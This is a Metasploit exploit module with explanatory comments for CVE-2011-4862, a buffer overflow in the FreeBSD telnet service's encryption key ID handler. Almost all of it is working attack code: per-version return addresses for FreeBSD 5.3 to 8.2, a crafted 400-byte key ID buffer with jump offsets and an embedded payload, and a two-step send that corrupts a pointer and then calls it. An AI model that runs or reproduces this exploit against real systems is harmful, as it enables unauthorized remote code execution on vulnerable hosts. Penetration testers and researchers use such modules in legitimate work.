# -*- coding: binary -*-

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2011-4862: a buffer overflow in the Telnet ENCRYPT
# option handler of the FreeBSD telnet service.
#
# The metadata below records the blast radius a defender should expect
# (see 'Notes'): the service crashes and restarts, and the attempt leaves
# entries in logs and artifacts on disk. 'Privileged' => true means the
# payload runs with the telnet service's privileges.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Telnet: provides connect/banner/sock/disconnect used in exploit_target.
  include Msf::Exploit::Remote::Telnet
  # BruteTargets: drives exploit_target(target) for the selected target(s).
  include Msf::Exploit::BruteTargets

  # Registers the module's metadata with the framework.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the encryption option handler of the
          FreeBSD telnet service.
        },
        'Author' => [
          'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>',
          'Brandon Perry <bperry.volatile[at]gmail.com>',
          'Dan Rosenberg',
          'hdm'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2011-4862'],
          ['OSVDB', '78020'],
          ['BID', '51182'],
          ['EDB', '18280']
        ],
        'Privileged' => true,
        'Platform' => 'bsd',
        'Arch' => [ ARCH_X86 ],
        # Only 128 bytes of payload are allowed; 0x00 is excluded because the
        # key-id data is carried as a string inside the telnet suboption.
        'Payload' => {
          'Space' => 128,
          'BadChars' => "\x00"
        },

        # Each concrete target carries a version-specific 'Ret' address; the
        # trailing comment names the instruction found there. 'Automatic'
        # has no 'Ret' of its own.
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
          [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
          [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
          [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
          [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
          [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
          [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
          [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
          # [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
          [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
          # Versions 5.2 and below do not support encryption
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-12-23',
        # Operational footprint: the target service crashes (and restarts),
        # and the attempt is visible in logs and on disk.
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
  end

  # Runs the exploit against one target entry.
  #
  # Flow: connect, send an ENCRYPT suboption to start negotiation, wait for
  # the expected reply, then send the oversized Key ID suboption twice (the
  # first send corrupts the pointer, the second triggers the call), start
  # the handler and disconnect.
  #
  # @param target [Hash] one entry from 'Targets'; only target['Ret'] is read
  # @return [nil] returns early (after a status message) if the server does
  #   not answer the first request
  # @raise via fail_with(Failure::Unknown) when no reply to the ENCRYPT
  #   request arrives within the timeout
  # NOTE(review): the 'Automatic' target carries no 'Ret', so target['Ret'] - 20
  # would fail on nil there; presumably BruteTargets only calls this with the
  # concrete targets — verify against the mixin.
  def exploit_target(target)
    connect
    # banner is provided by the Telnet mixin; only printed in verbose mode.
    banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
    vprint_status(banner_sanitized)

    # Telnet IAC SB (0xff 0xfa) for option 0x26 (ENCRYPT), closed by IAC SE
    # (0xff 0xf0). enc_init opens the negotiation; enc_keyid starts the
    # Key ID suboption whose body is the overflowing key_id buffer.
    enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
    enc_keyid = "\xff\xfa\x26\x07"
    end_suboption = "\xff\xf0"

    # Telnet protocol requires 0xff to be escaped with another
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    # 400-byte alphanumeric filler with fixed offsets patched in below:
    # 0..1 short jump, 72..75 and 76..79 the two little-endian addresses
    # derived from target['Ret'], 120..121 a second jump, 192.. the payload.
    key_id = Rex::Text.rand_text_alphanumeric(400)
    key_id[0, 2] = "\xeb\x76"
    key_id[72, 4] = [ target['Ret'] - 20 ].pack('V')
    key_id[76, 4] = [ target['Ret'] ].pack('V')

    # Some of these bytes can get mangled, jump over them
    key_id[80, 112] = Rex::Text.rand_text_alphanumeric(112)

    # Bounce to the real payload (avoid corruption)
    key_id[120, 2] = "\xeb\x46"

    # The actual payload
    key_id[192, penc.length] = penc

    # Create the Key ID command
    sploit = enc_keyid + key_id + end_suboption

    # Initiate encryption
    sock.put(enc_init)

    # Wait for a successful response: keep reading (5 s per read) until the
    # reply contains 0xff 0xfa 0x26 0x02 0x01. A read error or timeout is
    # treated as "encryption not supported" and aborts the run.
    loop do
      data = begin
        sock.get_once(-1, 5)
      rescue StandardError
        nil
      end
      if !data
        fail_with(Failure::Unknown, 'This system does not support encryption')
      end
      break if data.index("\xff\xfa\x26\x02\x01")
    end

    # The first request smashes the pointer
    print_status('Sending first payload')
    sock.put(sploit)

    # Make sure the server replied to the first request
    data = sock.get_once(-1, 5)
    unless data
      print_status('Server did not respond to first payload')
      return
    end

    # Some delay between each request seems necessary in some cases
    # (IO.select with no descriptors is used as a 0.5 s sleep).
    ::IO.select(nil, nil, nil, 0.5)

    # The second request results in the pointer being called
    print_status('Sending second payload...')
    sock.put(sploit)

    handler

    ::IO.select(nil, nil, nil, 0.5)
    disconnect
  end
end